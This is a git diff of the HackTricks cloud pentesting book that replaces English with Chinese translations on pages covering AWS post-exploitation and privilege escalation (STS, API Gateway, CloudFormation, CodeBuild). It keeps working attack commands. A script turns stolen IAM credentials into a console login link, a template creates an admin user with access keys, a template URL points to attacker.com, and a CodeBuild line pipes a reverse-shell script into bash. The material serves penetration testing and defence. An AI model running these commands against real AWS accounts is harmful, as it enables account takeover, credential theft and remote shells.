-12,20 +12,19 @@ For more information about this AWS service, check: ### `states:RevealSecrets` -This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. +此权限允许**在执行中揭示秘密数据**。为此,需要将检查级别设置为 TRACE,并将 revealSecrets 参数设置为 true。
### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` -An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. +拥有这些权限的攻击者将能够永久删除状态机、其版本和别名。这可能会中断关键工作流程,导致数据丢失,并需要大量时间来恢复和恢复受影响的状态机。此外,这将允许攻击者掩盖所用的痕迹,干扰取证调查,并可能通过删除重要的自动化流程和状态配置来削弱操作。 > [!NOTE] > -> - Deleting a state machine you also delete all its associated versions and aliases. -> - Deleting a state machine alias you do not delete the state machine versions referecing this alias. -> - It is not possible to delete a state machine version currently referenced by one o more aliases. - +> - 删除状态机时,您还会删除其所有关联的版本和别名。 +> - 删除状态机别名时,您不会删除引用此别名的状态机版本。 +> - 当前引用一个或多个别名的状态机版本无法删除。 ```bash # Delete state machine aws stepfunctions delete-state-machine --state-machine-arn @@ -34,45 +33,34 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn ``` - -- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. +- **潜在影响**: 关键工作流程中断、数据丢失和操作停机。 ### `states:UpdateMapRun` -An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. - +拥有此权限的攻击者将能够操纵 Map Run 失败配置和并行设置,能够增加或减少允许的最大子工作流执行数量,直接影响服务的性能。此外,攻击者还可以篡改容忍的失败百分比和计数,能够将此值减少到 0,这样每当一个项目失败时,整个 map run 将失败,直接影响状态机执行,并可能中断关键工作流程。 ```bash aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] ``` - -- **Potential Impact**: Performance degradation, and disruption of critical workflows. +- **潜在影响**:性能下降,以及关键工作流程的中断。 ### `states:StopExecution` -An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. +拥有此权限的攻击者可能能够停止任何状态机的执行,从而中断正在进行的工作流程和过程。这可能导致交易不完整、业务操作中断以及潜在的数据损坏。 > [!WARNING] -> This action is not supported by **express state machines**. - +> 此操作不支持 **express state machines**。 ```bash aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] ``` - -- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. +- **潜在影响**: 中断正在进行的工作流程、操作停机和潜在的数据损坏。 ### `states:TagResource`, `states:UntagResource` -An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者可以添加、修改或删除 Step Functions 资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws stepfunctions tag-resource --resource-arn --tags Key=,Value= aws stepfunctions untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md index 3cabd1b71..088234be1 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md @@ -1,24 +1,23 @@ -# AWS - STS Post Exploitation +# AWS - STS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## STS -For more information: +更多信息: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} -### From IAM Creds to Console +### 从 IAM 凭证到控制台 -If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\ -Note that the the user/role must have the permission **`sts:GetFederationToken`**. +如果您成功获取了一些 IAM 凭证,您可能会对使用以下工具**访问网络控制台**感兴趣。\ +请注意,用户/角色必须具有权限 **`sts:GetFederationToken`**。 -#### Custom script - -The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console: +#### 自定义脚本 +以下脚本将使用默认配置文件和默认 AWS 位置(非政府和非中国)为您提供一个签名 URL,您可以用它登录网络控制台: ```bash # Get federated creds (you must indicate a policy or they won't have any perms) ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges @@ -26,8 +25,8 @@ The following script will use the default profile and a default AWS location (no output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess) if [ $? -ne 0 ]; then - echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" - exit $status +echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" +exit $status fi # Parse the output @@ -43,10 +42,10 @@ federation_endpoint="https://signin.aws.amazon.com/federation" # Make the HTTP request to get the sign-in token resp=$(curl -s "$federation_endpoint" \ - --get \ - --data-urlencode "Action=getSigninToken" \ - --data-urlencode "SessionDuration=43200" \ - --data-urlencode "Session=$json_creds" +--get \ +--data-urlencode "Action=getSigninToken" \ +--data-urlencode "SessionDuration=43200" \ +--data-urlencode "Session=$json_creds" ) signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) @@ -55,11 +54,9 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) # Give the URL to login echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token" ``` - #### aws_consoler -You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler). - +您可以使用 [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler) **生成一个网络控制台链接**。 ```bash cd /tmp python3 -m venv env @@ -67,27 +64,23 @@ source ./env/bin/activate pip install aws-consoler aws_consoler [params...] #This will generate a link to login into the console ``` - > [!WARNING] -> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. +> 确保 IAM 用户具有 `sts:GetFederationToken` 权限,或提供一个角色以进行假设。 #### aws-vault -[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment. - +[**aws-vault**](https://github.com/99designs/aws-vault) 是一个在开发环境中安全存储和访问 AWS 凭证的工具。 ```bash aws-vault list aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds aws-vault login jonsmith # Open a browser logged as jonsmith ``` - > [!NOTE] -> You can also use **aws-vault** to obtain an **browser console session** +> 您还可以使用 **aws-vault** 来获取 **浏览器控制台会话** -### **Bypass User-Agent restrictions from Python** - -If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing: +### **通过 Python 绕过 User-Agent 限制** +如果存在 **基于用户代理执行某些操作的限制**(例如,基于用户代理限制使用 python boto3 库),可以使用前面的技术 **通过浏览器连接到 web 控制台**,或者您可以直接 **通过以下方式修改 boto3 用户代理**: ```bash # Shared by ex16x41 # Create a client @@ -100,9 +93,4 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda # Perform the action response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md index fe4f69e25..1c0fc6310 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md @@ -1,17 +1,13 @@ -# AWS - VPN Post Exploitation +# AWS - VPN 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## VPN -For more information: +更多信息: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md index ba8374b41..d1ea4db27 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md @@ -1,27 +1,23 @@ -# AWS - Privilege Escalation +# AWS - 权限提升 {{#include ../../../banners/hacktricks-training.md}} -## AWS Privilege Escalation +## AWS 权限提升 -The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. +在 AWS 中提升权限的方法是拥有足够的权限,以便能够以某种方式访问其他角色/用户/组的权限。通过链式提升,直到您获得组织的管理员访问权限。 > [!WARNING] -> AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. +> AWS 有 **数百**(如果不是数千)个 **权限** 可以授予实体。在本书中,您可以找到 **我知道的所有权限**,您可以利用这些权限来 **提升权限**,但如果您 **知道一些未提及的路径**,**请分享**。 > [!CAUTION] -> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ -> So remember that this is another way to **grant privileged permissions** to a principal. +> 如果 IAM 策略具有 `"Effect": "Allow"` 和 `"NotAction": "Someaction"` 指示一个 **资源**... 这意味着 **被允许的主体** 有 **权限执行除指定操作以外的任何操作**。\ +> 所以请记住,这是一种 **授予主体特权权限** 的另一种方式。 -**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** +**本节的页面按 AWS 服务排序。在这里,您将能够找到允许您提升权限的权限。** -## Tools +## 工具 - [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) - [Pacu](https://github.com/RhinoSecurityLabs/pacu) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md index 7f7edbc6e..99be2c6ac 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md @@ -4,7 +4,7 @@ ## Apigateway -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-api-gateway-enum.md @@ -12,44 +12,37 @@ For more information check: ### `apigateway:POST` -With this permission you can generate API keys of the APIs configured (per region). - +拥有此权限,您可以生成已配置的 API 的 API 密钥(按区域)。 ```bash aws --region apigateway create-api-key ``` - -**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. +**潜在影响:** 你无法通过此技术进行权限提升,但你可能会获得敏感信息的访问权限。 ### `apigateway:GET` -With this permission you can get generated API keys of the APIs configured (per region). - +通过此权限,你可以获取配置的 API 的生成 API 密钥(按区域)。 ```bash aws --region apigateway get-api-keys aws --region apigateway get-api-key --api-key --include-value ``` - -**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. +**潜在影响:** 你无法通过这种技术进行权限提升,但你可能会获得敏感信息的访问权限。 ### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH` -With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda). - +拥有这些权限后,可以修改API的资源策略,以便为自己提供调用它的权限,并滥用API网关可能具有的潜在访问权限(例如调用一个脆弱的lambda)。 ```bash aws apigateway update-rest-api \ - --rest-api-id api-id \ - --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' +--rest-api-id api-id \ +--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' ``` - -**Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info. +**潜在影响:** 通常情况下,您无法直接通过此技术进行权限提升,但您可能会获得敏感信息的访问权限。 ### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole` > [!NOTE] -> Need testing - -An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**. +> 需要测试 +具有权限 `apigateway:PutIntegration`、`apigateway:CreateDeployment` 和 `iam:PassRole` 的攻击者可以 **向现有的 API Gateway REST API 添加一个带有附加 IAM 角色的 Lambda 函数的新集成**。攻击者可以然后 **触发 Lambda 函数以执行任意代码,并可能获得与 IAM 角色相关联的资源的访问权限**。 ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" @@ -63,16 +56,14 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Access to resources associated with the Lambda function's IAM role. +**潜在影响**:访问与Lambda函数的IAM角色相关的资源。 ### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment` > [!NOTE] -> Need testing - -An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made. +> 需要测试 +拥有权限`apigateway:UpdateAuthorizer`和`apigateway:CreateDeployment`的攻击者可以**修改现有的API Gateway授权者**以绕过安全检查或在API请求时执行任意代码。 ```bash API_ID="your-api-id" AUTHORIZER_ID="your-authorizer-id" @@ -84,16 +75,14 @@ aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZ # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Bypassing security checks, unauthorized access to API resources. +**潜在影响**:绕过安全检查,未经授权访问API资源。 ### `apigateway:UpdateVpcLink` > [!NOTE] -> Need testing - -An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**. +> 需要测试 +拥有权限`apigateway:UpdateVpcLink`的攻击者可以**修改现有的VPC链接,使其指向不同的网络负载均衡器,可能会将私有API流量重定向到未经授权或恶意的资源**。 ```bash bashCopy codeVPC_LINK_ID="your-vpc-link-id" NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188" @@ -101,11 +90,6 @@ NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new # Update the VPC Link aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]" ``` - -**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic. +**潜在影响**:未经授权访问私有API资源,拦截或干扰API流量。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md index b477dc31f..b83d1489e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md @@ -4,10 +4,6 @@ ### chime:CreateApiKey -TODO +待办事项 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md index 39cba539e..e11e41cea 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md @@ -4,7 +4,7 @@ ## cloudformation -For more information about cloudformation check: +有关 cloudformation 的更多信息,请查看: {{#ref}} ../../aws-services/aws-cloudformation-and-codestar-enum.md @@ -12,111 +12,99 @@ For more information about cloudformation check: ### `iam:PassRole`, `cloudformation:CreateStack` -An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:** - +具有这些权限的攻击者 **可以提升权限**,通过制作一个 **CloudFormation 堆栈**,使用托管在其服务器上的自定义模板,**在指定角色的权限下执行操作:** ```bash aws cloudformation create-stack --stack-name \ - --template-url http://attacker.com/attackers.template \ - --role-arn +--template-url http://attacker.com/attackers.template \ +--role-arn ``` - -In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**: +在以下页面中,您有一个 **利用示例**,附加权限为 **`cloudformation:DescribeStacks`**: {{#ref}} iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md {{#endref}} -**Potential Impact:** Privesc to the cloudformation service role specified. +**潜在影响:** 提升到指定的 cloudformation 服务角色。 -### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`) - -In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario: +### `iam:PassRole`,(`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`) +在这种情况下,您可以 **滥用现有的 cloudformation 堆栈** 来更新它并提升权限,如前面的场景所示: ```bash aws cloudformation update-stack \ - --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ - --capabilities CAPABILITY_IAM \ - --region eu-west-1 +--stack-name privesc \ +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ +--capabilities CAPABILITY_IAM \ +--region eu-west-1 ``` +`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `UpdateStack` 权限** 以便对一个堆栈进行攻击。 -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. - -**Potential Impact:** Privesc to the cloudformation service role specified. +**潜在影响:** 提升到指定的 cloudformation 服务角色。 ### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy` -If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update). +如果你拥有这个权限但 **没有 `iam:PassRole`**,你仍然可以 **更新已使用的堆栈** 并滥用 **它们已经附加的 IAM 角色**。请查看前面的部分以获取利用示例(只需在更新中不指明任何角色)。 -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. +`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `UpdateStack` 权限** 以便对一个堆栈进行攻击。 -**Potential Impact:** Privesc to the cloudformation service role already attached. +**潜在影响:** 提升到已经附加的 cloudformation 服务角色。 ### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) -An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack. - -The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack. +拥有 **传递角色和创建 & 执行 ChangeSet** 权限的攻击者可以 **创建/更新一个新的 cloudformation 堆栈,滥用 cloudformation 服务角色**,就像使用 CreateStack 或 UpdateStack 一样。 +以下利用是 **变体**[ **CreateStack 的**](./#iam-passrole-cloudformation-createstack),使用 **ChangeSet 权限** 来创建一个堆栈。 ```bash aws cloudformation create-change-set \ - --stack-name privesc \ - --change-set-name privesc \ - --change-set-type CREATE \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::947247140022:role/CloudFormationAdmin \ - --capabilities CAPABILITY_IAM \ - --region eu-west-1 +--stack-name privesc \ +--change-set-name privesc \ +--change-set-type CREATE \ +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::947247140022:role/CloudFormationAdmin \ +--capabilities CAPABILITY_IAM \ +--region eu-west-1 echo "Waiting 2 mins to change the stack" sleep 120 aws cloudformation execute-change-set \ - --change-set-name privesc \ - --stack-name privesc \ - --region eu-west-1 +--change-set-name privesc \ +--stack-name privesc \ +--region eu-west-1 echo "Waiting 2 mins to execute the stack" sleep 120 aws cloudformation describe-stacks \ - --stack-name privesc \ - --region eu-west-1 +--stack-name privesc \ +--region eu-west-1 ``` +`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `ChangeSet` 权限** 以便对一个堆栈执行攻击。 -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack. - -**Potential Impact:** Privesc to cloudformation service roles. +**潜在影响:** 提升到 cloudformation 服务角色的权限。 ### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) -This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter: - +这与之前的方法类似,不需要传递 **IAM 角色**,所以你可以 **滥用已经附加的角色**,只需修改参数: ``` --change-set-type UPDATE ``` - -**Potential Impact:** Privesc to the cloudformation service role already attached. +**潜在影响:** 提升到已附加的 cloudformation 服务角色。 ### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`) -An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles. +攻击者可以滥用这些权限来创建/更新 StackSets,以滥用任意 cloudformation 角色。 -**Potential Impact:** Privesc to cloudformation service roles. +**潜在影响:** 提升到 cloudformation 服务角色。 ### `cloudformation:UpdateStackSet` -An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles. +攻击者可以在没有 passRole 权限的情况下滥用此权限来更新 StackSets,以滥用附加的 cloudformation 角色。 -**Potential Impact:** Privesc to the attached cloudformation roles. +**潜在影响:** 提升到附加的 cloudformation 角色。 -## References +## 参考 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md index d41f9062c..b154ab0d5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md @@ -2,84 +2,74 @@ {{#include ../../../../banners/hacktricks-training.md}} -An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: - +攻击者可以使用一个**cloudformation 模板**,生成**管理员**用户的**密钥**,例如: ```json { - "Resources": { - "AdminUser": { - "Type": "AWS::IAM::User" - }, - "AdminPolicy": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "Description": "This policy allows all actions on all resources.", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": ["*"], - "Resource": "*" - } - ] - }, - "Users": [ - { - "Ref": "AdminUser" - } - ] - } - }, - "MyUserKeys": { - "Type": "AWS::IAM::AccessKey", - "Properties": { - "UserName": { - "Ref": "AdminUser" - } - } - } - }, - "Outputs": { - "AccessKey": { - "Value": { - "Ref": "MyUserKeys" - }, - "Description": "Access Key ID of Admin User" - }, - "SecretKey": { - "Value": { - "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"] - }, - "Description": "Secret Key of Admin User" - } - } +"Resources": { +"AdminUser": { +"Type": "AWS::IAM::User" +}, +"AdminPolicy": { +"Type": "AWS::IAM::ManagedPolicy", +"Properties": { +"Description": "This policy allows all actions on all resources.", +"PolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": ["*"], +"Resource": "*" +} +] +}, +"Users": [ +{ +"Ref": "AdminUser" +} +] +} +}, +"MyUserKeys": { +"Type": "AWS::IAM::AccessKey", +"Properties": { +"UserName": { +"Ref": "AdminUser" +} +} +} +}, +"Outputs": { +"AccessKey": { +"Value": { +"Ref": "MyUserKeys" +}, +"Description": "Access Key ID of Admin User" +}, +"SecretKey": { +"Value": { +"Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"] +}, +"Description": "Secret Key of Admin User" +} +} } ``` - -Then **generate the cloudformation stack**: - +然后**生成云形成堆栈**: ```bash aws cloudformation create-stack --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::[REDACTED]:role/adminaccess \ - --capabilities CAPABILITY_IAM --region us-west-2 +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::[REDACTED]:role/adminaccess \ +--capabilities CAPABILITY_IAM --region us-west-2 ``` - -**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: - +**等待几分钟**以生成堆栈,然后**获取堆栈的输出**,其中**存储了凭据**: ```bash aws cloudformation describe-stacks \ - --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ - --region uswest-2 +--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ +--region uswest-2 ``` - -### References +### 参考文献 - [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index b179bec22..ae33bb59c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -4,7 +4,7 @@ ## codebuild -Get more info in: +获取更多信息: {{#ref}} ../aws-services/aws-codebuild-enum.md @@ -12,70 +12,65 @@ Get more info in: ### `codebuild:StartBuild` | `codebuild:StartBuildBatch` -Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: +仅凭其中一个权限就足以触发一个新的 buildspec 的构建,并窃取分配给该项目的 iam 角色的令牌: {{#tabs }} {{#tab name="StartBuild" }} - ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` - {{#endtab }} {{#tab name="StartBuildBatch" }} - ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` - {{#endtab }} {{#endtabs }} -**Note**: The difference between these two commands is that: +**注意**:这两个命令之间的区别在于: -- `StartBuild` triggers a single build job using a specific `buildspec.yml`. -- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). +- `StartBuild` 使用特定的 `buildspec.yml` 触发单个构建作业。 +- `StartBuildBatch` 允许您启动一批构建,具有更复杂的配置(例如并行运行多个构建)。 -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**潜在影响**:直接提升到附加的 AWS Codebuild 角色。 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) -An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. +拥有 **`iam:PassRole`, `codebuild:CreateProject` 和 `codebuild:StartBuild` 或 `codebuild:StartBuildBatch`** 权限的攻击者将能够 **通过创建一个正在运行的构建来提升到任何 codebuild IAM 角色**。 {{#tabs }} {{#tab name="Example1" }} - ```bash # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" @@ -84,20 +79,20 @@ REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" JSON="{ - \"name\": \"codebuild-demo-project\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"aws/codebuild/standard:1.0\", - \"computeType\": 